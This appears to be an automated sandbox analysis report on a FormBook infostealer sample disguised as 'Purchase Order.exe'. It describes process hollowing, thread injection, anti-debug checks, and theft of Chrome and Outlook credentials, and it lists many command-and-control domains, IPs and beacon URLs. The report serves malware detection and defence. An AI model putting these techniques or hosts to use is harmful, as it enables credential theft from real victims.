Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457FE87 mov eax, dword ptr fs:[00000030h]	16_2_0457FE87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451FAB0 mov eax, dword ptr fs:[00000030h]	16_2_0451FAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E52A5 mov eax, dword ptr fs:[00000030h]	16_2_044E52A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E52A5 mov eax, dword ptr fs:[00000030h]	16_2_044E52A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E52A5 mov eax, dword ptr fs:[00000030h]	16_2_044E52A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E52A5 mov eax, dword ptr fs:[00000030h]	16_2_044E52A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E52A5 mov eax, dword ptr fs:[00000030h]	16_2_044E52A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045646A7 mov eax, dword ptr fs:[00000030h]	16_2_045646A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B0EA5 mov eax, dword ptr fs:[00000030h]	16_2_045B0EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B0EA5 mov eax, dword ptr fs:[00000030h]	16_2_045B0EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B0EA5 mov eax, dword ptr fs:[00000030h]	16_2_045B0EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FAAB0 mov eax, dword ptr fs:[00000030h]	16_2_044FAAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FAAB0 mov eax, dword ptr fs:[00000030h]	16_2_044FAAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B8B58 mov eax, dword ptr fs:[00000030h]	16_2_045B8B58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EDB40 mov eax, dword ptr fs:[00000030h]	16_2_044EDB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FEF40 mov eax, dword ptr fs:[00000030h]	16_2_044FEF40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EF358 mov eax, dword ptr fs:[00000030h]	16_2_044EF358
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04513B7A mov eax, dword ptr fs:[00000030h]	16_2_04513B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04513B7A mov eax, dword ptr fs:[00000030h]	16_2_04513B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EDB60 mov ecx, dword ptr fs:[00000030h]	16_2_044EDB60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FFF60 mov eax, dword ptr fs:[00000030h]	16_2_044FFF60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B8F6A mov eax, dword ptr fs:[00000030h]	16_2_045B8F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A131B mov eax, dword ptr fs:[00000030h]	16_2_045A131B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457FF10 mov eax, dword ptr fs:[00000030h]	16_2_0457FF10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457FF10 mov eax, dword ptr fs:[00000030h]	16_2_0457FF10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B070D mov eax, dword ptr fs:[00000030h]	16_2_045B070D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B070D mov eax, dword ptr fs:[00000030h]	16_2_045B070D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451A70E mov eax, dword ptr fs:[00000030h]	16_2_0451A70E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451A70E mov eax, dword ptr fs:[00000030h]	16_2_0451A70E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E4F2E mov eax, dword ptr fs:[00000030h]	16_2_044E4F2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E4F2E mov eax, dword ptr fs:[00000030h]	16_2_044E4F2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451E730 mov eax, dword ptr fs:[00000030h]	16_2_0451E730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045237F5 mov eax, dword ptr fs:[00000030h]	16_2_045237F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F1B8F mov eax, dword ptr fs:[00000030h]	16_2_044F1B8F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F1B8F mov eax, dword ptr fs:[00000030h]	16_2_044F1B8F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451B390 mov eax, dword ptr fs:[00000030h]	16_2_0451B390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04567794 mov eax, dword ptr fs:[00000030h]	16_2_04567794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04567794 mov eax, dword ptr fs:[00000030h]	16_2_04567794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04567794 mov eax, dword ptr fs:[00000030h]	16_2_04567794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A138A mov eax, dword ptr fs:[00000030h]	16_2_045A138A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0459D380 mov ecx, dword ptr fs:[00000030h]	16_2_0459D380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B5BA5 mov eax, dword ptr fs:[00000030h]	16_2_045B5BA5

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Code function: 2_2_01589540 NtReadFile,LdrInitializeThunk,

2_2_01589540

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe	Domain query: www.bandmarket.live
Source: C:\Windows\explorer.exe	Network Connect: 150.95.59.33 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.87 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.159.66.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.montazeran.net
Source: C:\Windows\explorer.exe	Network Connect: 192.64.116.149 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.aurakids.website
Source: C:\Windows\explorer.exe	Domain query: www.paulmontecalvo.com
Source: C:\Windows\explorer.exe	Network Connect: 154.209.88.140 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.modbox.site
Source: C:\Windows\explorer.exe	Domain query: www.wewantabreak.com
Source: C:\Windows\explorer.exe	Domain query: www.khelojeetopro.com
Source: C:\Windows\explorer.exe	Domain query: www.nnncb.top
Source: C:\Windows\explorer.exe	Network Connect: 193.141.64.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 63.32.216.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.biggaming.xyz
Source: C:\Windows\explorer.exe	Network Connect: 46.249.204.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.occludy.com
Source: C:\Windows\explorer.exe	Network Connect: 155.159.61.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.124.203.191 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.162.130 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.79.230.147 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.malaya.live
Source: C:\Windows\explorer.exe	Domain query: www.parkperge.com
Source: C:\Windows\explorer.exe	Domain query: www.majordaiyanoace.com
Source: C:\Windows\explorer.exe	Domain query: www.lilustrlousdates.com
Source: C:\Windows\explorer.exe	Network Connect: 3.13.90.76 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.40.162.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.opulentdome.uk
Source: C:\Windows\explorer.exe	Network Connect: 185.106.208.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.175.163.144 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 910000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Thread register set: target process: 3320			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3320			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Process created: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe

Jump to behavior

Source: explorer.exe, 00000005.00000000.325920829.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.259008706.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.300891164.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.325920829.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.275165812.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.329237644.00000000056F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.325920829.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.259008706.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.325394730.00000000004C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.325920829.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.259008706.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.300891164.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Purchase Order.exe

0_2_0040352D

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Access Token Manipulation	4 Obfuscated Files or Information	1 Input Capture	4 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	512 Process Injection	3 Software Packing	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	2 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Virtualization/Sandbox Evasion	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	512 Process Injection	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Purchase Order.exe	44%	Virustotal		Browse
Purchase Order.exe	64%	ReversingLabs	Win32.Trojan.NSISInject
Purchase Order.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\EEF0.tmp	100%	Avira	TR/Crypt.ZPACK.Gen2
C:\Users\user\AppData\Local\Temp\EEF0.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EEF0.tmp	69%	ReversingLabs	Win32.Trojan.FormBook
C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	69%	ReversingLabs	Win32.Trojan.GenericML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.sphybwtjm.exe.730000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.sphybwtjm.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.4803814.4.unpack	100%	Avira	TR/ATRAPS.Gen5	Download File
16.2.rundll32.exe.6e4cd8.0.unpack	100%	Avira	TR/ATRAPS.Gen5	Download File
1.0.sphybwtjm.exe.730000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.sphybwtjm.exe.730000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.sphybwtjm.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.sphybwtjm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.searchvity.com/	100%	URL Reputation	malware
http://www.malaya.live/hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnssMZ1gBiQNZAQWNQOMLHZ0WRUsNJ0JTIQulzNrWS92rI&5jSp=DfjdjluHJP1L6t	0%	Avira URL Cloud	safe
http://www.opulentdome.uk/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=FnNfFBdE6KPnVJCtupekHJkjgZFJe5QHOUSjJCZmfBdQKmSNG8cathNKdTXwFUOlpWErHg09uuesQ1LGhXMc+UdVb1pWxSsiOvNgB/qg6YJ5	0%	Avira URL Cloud	safe
http://www.aurakids.website/hcfu/	0%	Avira URL Cloud	safe
http://www.montazeran.net/hcfu/	0%	Avira URL Cloud	safe
http://www.modbox.site/hcfu/	0%	Avira URL Cloud	safe
http://www.parkperge.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt	0%	Avira URL Cloud	safe
http://www.lilustrlousdates.com/hcfu/	0%	Avira URL Cloud	safe
http://www.nnncb.top/hcfu/	0%	Avira URL Cloud	safe
http://www.malaya.live/hcfu/	0%	Avira URL Cloud	safe
http://www.searchvity.com/?dn=	100%	URL Reputation	malware
http://www.opulentdome.uk/hcfu/	0%	Avira URL Cloud	safe
http://www.biggaming.xyz/hcfu/?u0Gp2vp8=DcR1klBM4JBmZMLd6nvoC7lGrdIYWHbYnViGVkJW/JRBNZmMbg24lMYBXluvYDtmC8yqXkPgj1fAOXZkFouqzsLqhHeORSR6vsolbcc5pjEQ&5jSp=DfjdjluHJP1L6t	0%	Avira URL Cloud	safe
http://www.montazeran.net/hcfu/?u0Gp2vp8=EAGH4IFhh6xE7YX+q6dzLzxowCGyCVWdEG2UGekGzSzRY3UgsSkbc9AFTcp0S8/1Y2oVSaiG2hU25Np27E35wcBaAhf/HofUYUzmWEnkiOgR&5jSp=DfjdjluHJP1L6t	0%	Avira URL Cloud	safe
http://www.nnncb.top/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=OmX4tUPXqRB8MMCbJ2d2I1QXSAa/kGMN1kVgIVLBij3Fuh3JYlWO9rbbVhNUJ+THoGRZCsrEKqKuThOHyDfP/PgcDPlZBbCCTOt+7qepiG6w	0%	Avira URL Cloud	safe
http://www.patrickguarte.com/hcfu/	0%	Avira URL Cloud	safe
http://www.biggaming.xyz/hcfu/	0%	Avira URL Cloud	safe
http://www.paulmontecalvo.com/hcfu/	0%	Avira URL Cloud	safe
http://www.occludy.com/hcfu/	0%	Avira URL Cloud	safe
http://www.bandmarket.live/hcfu/	0%	Avira URL Cloud	safe
www.majordaiyanoace.com/hcfu/	0%	Avira URL Cloud	safe
http://www.wewantabreak.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ	0%	Avira URL Cloud	safe
http://www.parkperge.com/hcfu/	0%	Avira URL Cloud	safe
http://malaya.live/hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnss	0%	Avira URL Cloud	safe
http://www.majordaiyanoace.com/hcfu/?u0Gp2vp8=nmIKxue9fq/wPVZukOB9TkwbQhnMn+EZhkHuSgXE385x5HS1Nfm9dHmrnO7NAE1ZtguQW3vFvHO2aEKxRmVjqrDRtY5yZbLfhBI/hScq3dTS&5jSp=DfjdjluHJP1L6t	0%	Avira URL Cloud	safe
http://www.khelojeetopro.com/hcfu/	0%	Avira URL Cloud	safe
http://www.patrickguarte.com/hcfu/?u0Gp2vp8=QpRnf8hbMplr0MVruU+mSsmXd47Y/RN6g+aq49FGHEQqzvBAGK38lH6pvC4RIkCAaMFgrfUcGt/BsHWKvIAR7oL0ypwQXqHPXRUpgIJQNUAI&5jSp=DfjdjluHJP1L6t	0%	Avira URL Cloud	safe
http://www.occludy.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=3O8YptSPemKM8sIzZF8JOEGsdynbMd9NIarJRYJ/0cybmcm84igDod77Kw8YrhDfbeeXJmV/Xta+McyiqIfptDKdRtzZKR6FvkWjf1CaB2nt	0%	Avira URL Cloud	safe
http://www.majordaiyanoace.com/hcfu/	0%	Avira URL Cloud	safe
http://www.lilustrlousdates.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=4DW0Ix2ISCDXzyRIq6nLWpFg/kOd6MPQeoh+U0+q17Szsp1AtfvcjVsYAYVpuBtjTM9sWhorW0wi6/FtiSniUr4Ev2EWFbeUdNVgc9Noh4aH	0%	Avira URL Cloud	safe
http://www.paulmontecalvo.com/hcfu/?u0Gp2vp8=hgu/VmoXDf6UNxe0oUcrLUetbm135fy9k2oFvNtbYeh4n6osOzYSt1ckvEFN+4fwt+77PX6U4+O9/Te6nTne3r1wHJXq9JP+reirnUB6JbLe&5jSp=DfjdjluHJP1L6t	0%	Avira URL Cloud	safe
http://www.khelojeetopro.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=MNpom6rckKTYc/p1bd1msiE7/E65ho0u4Akvh+C3tvGatf13TKlIwaeKtMXL5ZEx/m2/gQUExMh3ECGJi31qDG5C0hkBNbhOEhSrDflhNah3	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.patrickguarte.com	155.159.61.221	true	true	unknown
www.nnncb.top	154.209.88.140	true	true	unknown
www.bandmarket.live	192.64.116.149	true	true	unknown
www.biggaming.xyz	3.13.90.76	true	true	unknown
www.occludy.com	217.160.0.87	true	true	unknown
montazeran.net	193.141.64.241	true	true	unknown
m1.mtrafficgeo.com	63.32.216.166	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	unknown
majordaiyanoace.com	150.95.59.33	true	true	unknown
www.paulmontecalvo.com	38.40.162.145	true	true	unknown
khelojeetopro.com	103.175.163.144	true	true	unknown
www.opulentdome.uk	46.249.204.182	true	true	unknown
wewantabreak.com	74.124.203.191	true	true	unknown
aurakids.website	185.106.208.3	true	true	unknown
www.modbox.site	66.96.162.130	true	true	unknown
malaya.live	51.79.230.147	true	true	unknown
www.khelojeetopro.com	unknown	unknown	true	unknown
www.montazeran.net	unknown	unknown	true	unknown
www.malaya.live	unknown	unknown	true	unknown
www.aurakids.website	unknown	unknown	true	unknown
www.parkperge.com	unknown	unknown	true	unknown
www.majordaiyanoace.com	unknown	unknown	true	unknown
www.lilustrlousdates.com	unknown	unknown	true	unknown
www.wewantabreak.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.malaya.live/hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnssMZ1gBiQNZAQWNQOMLHZ0WRUsNJ0JTIQulzNrWS92rI&5jSp=DfjdjluHJP1L6t	true	Avira URL Cloud: safe	unknown
http://www.malaya.live/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.parkperge.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt	true	Avira URL Cloud: safe	unknown
http://www.nnncb.top/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.opulentdome.uk/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=FnNfFBdE6KPnVJCtupekHJkjgZFJe5QHOUSjJCZmfBdQKmSNG8cathNKdTXwFUOlpWErHg09uuesQ1LGhXMc+UdVb1pWxSsiOvNgB/qg6YJ5	true	Avira URL Cloud: safe	unknown
http://www.opulentdome.uk/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.aurakids.website/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.modbox.site/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.lilustrlousdates.com/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.montazeran.net/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.biggaming.xyz/hcfu/?u0Gp2vp8=DcR1klBM4JBmZMLd6nvoC7lGrdIYWHbYnViGVkJW/JRBNZmMbg24lMYBXluvYDtmC8yqXkPgj1fAOXZkFouqzsLqhHeORSR6vsolbcc5pjEQ&5jSp=DfjdjluHJP1L6t	true	Avira URL Cloud: safe	unknown
http://www.montazeran.net/hcfu/?u0Gp2vp8=EAGH4IFhh6xE7YX+q6dzLzxowCGyCVWdEG2UGekGzSzRY3UgsSkbc9AFTcp0S8/1Y2oVSaiG2hU25Np27E35wcBaAhf/HofUYUzmWEnkiOgR&5jSp=DfjdjluHJP1L6t	true	Avira URL Cloud: safe	unknown
http://www.patrickguarte.com/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.biggaming.xyz/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.paulmontecalvo.com/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.occludy.com/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.nnncb.top/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=OmX4tUPXqRB8MMCbJ2d2I1QXSAa/kGMN1kVgIVLBij3Fuh3JYlWO9rbbVhNUJ+THoGRZCsrEKqKuThOHyDfP/PgcDPlZBbCCTOt+7qepiG6w	true	Avira URL Cloud: safe	unknown
http://www.bandmarket.live/hcfu/	true	Avira URL Cloud: safe	unknown
http://www.wewantabreak.com/hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ	true	Avira URL Cloud: safe	unknown
http://www.parkperge.com/hcfu/	true	Avira URL Cloud: safe	unknown
www.majordaiyanoace.com/hcfu/	true	Avira URL Cloud: safe	low
